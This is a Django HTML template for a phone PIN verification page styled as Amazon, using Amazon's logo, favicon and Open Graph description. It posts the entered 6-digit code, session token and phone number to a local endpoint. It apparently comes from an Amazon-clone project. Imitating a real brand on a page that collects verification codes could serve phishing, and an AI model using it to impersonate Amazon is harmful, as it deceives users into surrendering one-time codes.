<!DOCTYPE html>
<html lang="en">
  <head>
      {% load static %}
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Enter The Pin</title>
    <link rel="stylesheet" href="{% static 'home/css/login.css' %}" />
    <meta
      property="og:image"
      content="http://g-ec2.images-amazon.com/images/G/01/social/api-share/amazon_logo_500500._V323939215_.png"
      xmlns:og="http://opengraphprotocol.org/schema/"
    />
    <link
      rel="icon"
      href="{% static 'home/img/amazon-logo-favicon.png' %}"
      type="image/x-icon"
    />
    <link
      rel="shortcut icon"
      href="{% static 'home/img/amazon-logo-favicon.png' %}"
      type="image/x-icon"
    />
    <meta
      property="og:description"
      content="Free delivery on millions of items with Prime. Low prices across earth's biggest selection of books, music, DVDs, electronics, computers, software, apparel & accessories, shoes, jewelry, tools & hardware, housewares, furniture, sporting goods, beauty & personal care, groceries & just about anything else."
      xmlns:og="http://opengraphprotocol.org/schema/"
    />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  </head>
  <body>
     <div class="login">
      <img
        class="login__logo"
        src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/a9/Amazon_logo.svg/1024px-Amazon_logo.svg.png"
      />
      <!-- This section wil be displayed to enter the number-->
      <div class="login__container" style="display: block">
        <h1>Enter Your Number</h1>

        <form method="POST" action="/api/phone/verify">
          {% csrf_token %}
          <h5>Pin</h5>
          <input type="number" name="security_code" required />
             <input type="hidden" name="session_token" value="{{session_token}}" />
      <input
        type="hidden"
        name="phone_number"
        value="{{phonenumber.data.phone_number}}"
      />
      <input type="hidden" name="user_id" value="{{request.user}}" />

          <p><b>Information About Pin</b></p>

          <p style="font-size: 12px">
            A 6 digit pin has been sent to your number. The pin is only valid for an hour and then you will have to request another pin.
            
          </p>
          <button type="submit" class="login__signInButton">Verify</button>
        </form>
      </div>
  </body>
</html>
